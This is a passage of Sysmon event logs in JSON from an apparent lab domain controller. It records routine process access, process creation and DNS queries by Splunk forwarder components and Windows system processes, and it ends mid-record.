{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3812,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.270\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00107C4D0500}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.270","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00107C4D0500}","TargetProcessId":"4620","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3813,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.410\r\nSourceProcessGUID: {41C8662E-1FFD-5F25-0000-0010B6CD0500}\r\nSourceProcessId: 4620\r\nSourceThreadId: 4452\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.410","SourceProcessGUID":"{41C8662E-1FFD-5F25-0000-0010B6CD0500}","SourceProcessId":"4620","SourceThreadId":"4452","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":3814,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.755\r\nProcessGuid: {41C8662E-1FFB-5F25-0000-0010E3B20500}\r\nProcessId: 3916\r\nQueryName: win-dc-6178966\r\nQueryStatus: 0\r\nQueryResults: fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.755","ProcessGuid":"{41C8662E-1FFB-5F25-0000-0010E3B20500}","QueryName":"win-dc-6178966","QueryStatus":"0","QueryResults":"fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;","Image":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3815,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.943\r\nProcessGuid: {41C8662E-1FFD-5F25-0000-0010BECF0500}\r\nProcessId: 4552\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.943","ProcessGuid":"{41C8662E-1FFD-5F25-0000-0010BECF0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3816,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.942\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FFD-5F25-0000-0010BECF0500}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.942","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FFD-5F25-0000-0010BECF0500}","TargetProcessId":"4552","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3817,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.942\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FFD-5F25-0000-0010BECF0500}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.942","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FFD-5F25-0000-0010BECF0500}","TargetProcessId":"4552","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3818,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.942\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.942","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3819,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.942\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.942","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3820,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.942\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.942","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3821,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.942\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 